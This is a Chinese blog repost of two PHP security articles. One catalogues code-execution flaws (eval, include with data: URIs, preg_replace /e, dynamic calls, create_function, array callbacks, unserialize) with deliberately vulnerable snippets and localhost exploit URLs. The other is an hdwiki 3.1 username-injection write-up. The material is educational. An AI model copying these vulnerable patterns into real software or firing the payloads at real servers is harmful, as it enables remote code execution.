PHP代码执行漏洞总结

fdsajhg — Wed, 23 Feb 2011 15:12:00 GMT

PHP代码执行漏洞总结

时间:2010-08-30 14:05来源:百度作者:menzhi007 点击:117次

总结的很全面的一篇关于php漏洞方面的文章，学习，by daokers

PHP安全爱好者的盛宴the Month of PHP Security 。拜读php-security上的很多牛文，发出来共享下啦，都是偶像哇。

From:http://hi.baidu.com/menzhi007

一代码执行函数

PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等

demo code 1.1:

echo `dir`;
?>

二文件包含代码注射

文件包含函数在特定条件下的代码注射，如include()、include_once()、 require()、require_once()。

当allow_url_include=On ，PHP Version>=5.2.0 时，导致代码注射。

demo code 2.1:

include($_GET['a']);
?>

访问http://127.0.0.1/include.php?a=data:text/plain,%3C?php%20phpinfo%28%29;?%3E 即
执行phpinfo()。

三正则匹配代码注射

众所周知的preg_replace()函数导致的代码注射。当pattern中存在/e模式修饰符，即允许执行代码。这里我们分三种情况讨论下

3.1 preg_replace() pattern 参数注射

pattern即第一个参数的代码注射。
当magic_quotes_gpc=Off时，导致代码执行。

demo code 3.1:

echo $regexp = $_GET['reg'];
$var = 'phpinfo()';
preg_replace("/(.*?)$regexp", '\\1', $var);
?>

访问http://127.0.0.1/preg_replace1.php?reg=%3C\/php%3E/e 即
执行phpinfo()。

3.2 preg_replace() replacement参数注射

replacement即第二个参数的代码注射，导致代码执行。

demo code 3.2:

preg_replace("/menzhi007/e",$_GET['h'],"jutst test menzhi007!");
?>

当我们提交 http://127.0.0.1/preg_replace2.php?h=phpinfo() 即
执行phpinfo()。

3.3 preg_replace()第三个参数注射

我们通过构造subject参数执行代码。提交：http://127.0.0.1/preg_replace3.php?h=[php]phpinfo()[/php]

或者 http://127.0.0.1/preg_replace3.php?h=[php]${phpinfo%28%29}[/php] 导致代码执行

demo code 3.3:

preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", "\\1", $_GET['h']);
?>

四动态代码执行

4.1 动态变量代码执行

demo code 4.1:

$dyn_func = $_GET['dyn_func'];
$argument = $_GET['argument'];
$dyn_func($argument);
?>

我们提交 http://127.0.0.1/dyn_func.php?dyn_func=system&argument=ipconfig 执行ipconfig命令

4.2 动态函数代码执行

demo code 4.2:

$foobar = $_GET['foobar'];
$dyn_func = create_function('$foobar', "echo $foobar;");
$dyn_func('');
?>

我们提交 http://127.0.0.1/create_function.php?foobar=system%28dir%29 执行dir命令

五其他

5.1 ob_start()函数的代码执行

demo code 5.1:

$foobar = 'system';
ob_start($foobar);
echo 'dir';
ob_end_flush();
?>

5.2 array_map()函数的代码执行

demo code 5.2:

$evil_callback = $_GET['callback'];
$some_array = array(0, 1, 2, 3);
$new_array = array_map($evil_callback, $some_array);
?>

我们提交 http://127.0.0.1/array_map.php?callback=phpinfo 即执行phpinfo()。

5.3 unserialize()与eval()

unserialize（）是PHP中使用率非常高的函数。不正当使用unserialize（）容易导致安全隐患。
(黑哥那个挑战2 http://hi.baidu.com/hi_heige/blog/item/505b2828da5b18f499250a9b.html)

demo code 5.3:

class Example {
var $var = '';
function __destruct() {
eval($this->var);
}
}
unserialize($_GET['saved_code']);

?>
我们提交 http://127.0.0.1/unserialize.php?saved_code=O:7:%22Example%22:1:{s:3:%22var%22;s:10:%22phpinfo%28%29;%22;} 即执行phpinfo()。

5.4 容易导致安全问题的函数

同类型函数还有很多
array_map()
usort(), uasort(), uksort()
array_filter()
array_reduce()
array_diff_uassoc(), array_diff_ukey()
array_udiff(), array_udiff_assoc(), array_udiff_uassoc()
array_intersect_assoc(), array_intersect_uassoc()
array_uintersect(), array_uintersect_assoc(), array_uintersect_uassoc()
array_walk(), array_walk_recursive()
xml_set_character_data_handler()
xml_set_default_handler()
xml_set_element_handler()
xml_set_end_namespace_decl_handler()
xml_set_external_entity_ref_handler()
xml_set_notation_decl_handler()
xml_set_processing_instruction_handler()
xml_set_start_namespace_decl_handler()
xml_set_unparsed_entity_decl_handler()
stream_filter_register()
set_error_handler()
register_shutdown_function()
register_tick_function()

参考自：http://php-security.org/2010/05/20/mops-submission-07-our-dynamic-php/index.html

(责任编辑：刀)

fdsajhg 2011-02-23 23:12 发表评论

快速寻找hdwiki的一个代码执行漏洞

fdsajhg — Tue, 15 Feb 2011 17:19:00 GMT

快速寻找hdwiki的一个代码执行漏洞

时间：2009-10-27 23:30:56 来源：本站整理作者：佚名在线投稿

TAG标签：hdwiki 漏洞代码

By q1ur3n

http://www.wolvez.org/

2008-11-14

说说过程吧,当然这样的洞是很低级的,纯属给大家娱乐。:)

安装好hdwiki后我注册了一个名为testtest的用户，然后cmd下cd到hdwiki的目录，执行
findstr /s /i /n "testtest" *.php
结果如下：
wikidata\cache\cache_index_chartsuser.php:1:a:2:{i:0;a:5:{s:7:"user_id";s:1:"2";
s:9:"user_nick";s:4:"root";s:10:"user_click";s:1:"0";s:13:"user_nick_alt";s:4:"r
oot";s:15:"user_rewriteurl";s:18:"space.php?userid=2";}i:1;a:5:{s:7:"user_id";s:
2:"14";s:9:"user_nick";s:8:"testtest";s:10:"user_click";s:1:"0";s:13:"user_nick_
alt";s:8:"testtest";s:15:"user_rewriteurl";s:19:"space.php?userid=14";}}

wikidata\cache\cache_index_activeuser.php:1:a:2:{i:0;a:5:{s:7:"user_id";s:1:"2";s:9:"use
r_nick";s:4:"root";s:14:"user_small_ico";s:0:"";s:13:"user_nick_alt";s:4:"root";
s:15:"user_rewriteurl";s:18:"space.php?userid=2";}i:1;a:5:{s:7:"user_id";s:2:"14
";s:9:"user_nick";s:4:"tes.";s:14:"user_small_ico";s:0:"";s:13:"user_nick_alt";s
:8:"testtest";s:15:"user_rewriteurl";s:19:"space.php?userid=14";}}

wikidata\cache\cache_index_latestuser.php:1:a:2:{i:0;a:5:{s:7:"user_id";s:2:"14";s:9:"user_nic
k";s:4:"tes.";s:14:"user_small_ico";s:0:"";s:13:"user_nick_alt";s:8:"testtest";s
:15:"user_rewriteurl";s:19:"space.php?userid=14";}i:1;a:5:{s:7:"user_id";s:1:"2"
;s:9:"user_nick";s:4:"root";s:14:"user_small_ico";s:0:"";s:13:"user_nick_alt";s:
4:"root";s:15:"user_rewriteurl";s:18:"space.php?userid=2";}}

可以看到testtest被写入了这三个php文件里了,并且这三个php缓存文件可以正常执行,

于是我接着注册了一个名为q1ur3n的用户,再退出登陆了一次,

cmd下执行findstr /s /i /n "q1ur3n" *.php

结果如下

wikidata\cache\cache_index_chartsuser.php:1:a:3:{i:0;a:5:{s:7:"user_id";s:1:"2";
s:9:"user_nick";s:4:"root";s:10:"user_click";s:1:"0";s:13:"user_nick_alt";s:4:"r
oot";s:15:"user_rewriteurl";s:18:"space.php?userid=2";}i:1;a:5:{s:7:"user_id";s:
2:"14";s:9:"user_nick";s:8:"testtest";s:10:"user_click";s:1:"0";s:13:"user_nick_
alt";s:8:"testtest";s:15:"user_rewriteurl";s:19:"space.php?userid=14";}i:2;a:5:{
s:7:"user_id";s:2:"15";s:9:"user_nick";s:6:"q1ur3.";s:10:"user_click";s:1:"0";s:
13:"user_nick_alt";s:20:"q1ur3n";s:15:"user_rewriteurl";s:19:"spac
e.php?userid=15";}}

wikidata\cache\cache_index_activeuser.php:1:a:3:{i:0;a:5:{s:7:"user_id";s:1:"2";s:9:"user_nick";s:4:"root";s:14:"user_small_ico";s:0:"";s:13:
"user_nick_alt";s:4:"root";s:15:"user_rewriteurl";s:18:"space.php?userid=2";}i:1
;a:5:{s:7:"user_id";s:2:"14";s:9:"user_nick";s:4:"tes.";s:14:"user_small_ico";s:
0:"";s:13:"user_nick_alt";s:8:"testtest";s:15:"user_rewriteurl";s:19:"space.php?
userid=14";}i:2;a:5:{s:7:"user_id";s:2:"15";s:9:"user_nick";s:4:"q1u.";s:14:"use
r_small_ico";s:0:"";s:13:"user_nick_alt";s:20:"q1ur3n";s:15:"user_
rewriteurl";s:19:"space.php?userid=15";}}

wikidata\cache\cache_index_latestuser.php:1:a:3:{i:0;a:5:{s:7:"user_id";s:2:"15";s:9:"user_nick";s:4:"q1u.";s:14:"user_
small_ico";s:0:"";s:13:"user_nick_alt";s:20:"q1ur3n";s:15:"user_re
writeurl";s:19:"space.php?userid=15";}i:1;a:5:{s:7:"user_id";s:2:"14";s:9:"user_
nick";s:4:"tes.";s:14:"user_small_ico";s:0:"";s:13:"user_nick_alt";s:8:"testtest
";s:15:"user_rewriteurl";s:19:"space.php?userid=14";}i:2;a:5:{s:7:"user_id";s:1:
"2";s:9:"user_nick";s:4:"root";s:14:"user_small_ico";s:0:"";s:13:"user_nick_alt"
;s:4:"root";s:15:"user_rewriteurl";s:18:"space.php?userid=2";}}

访问
http://localhost/hdwiki/wikidata/cache/cache_index_chartsuser.php
http://localhost/hdwiki/wikidata/cache/cache_index_latestuser.php
http://localhost/hdwiki/wikidata/cache/cache_index_activeuser.php

可爱的phpinfo出来了.:)

当然能碰到这样的漏洞也真的需要人品好才行(我当时有去买彩票的冲动),

不过作为php漏洞的fuzz这个应该算是很典型的。

哦,hdwiki的版本是3.1的,比较老。

fdsajhg 2011-02-16 01:19 发表评论

C++博客-架构-随笔分类-5_5_命令执行

PHP代码执行漏洞总结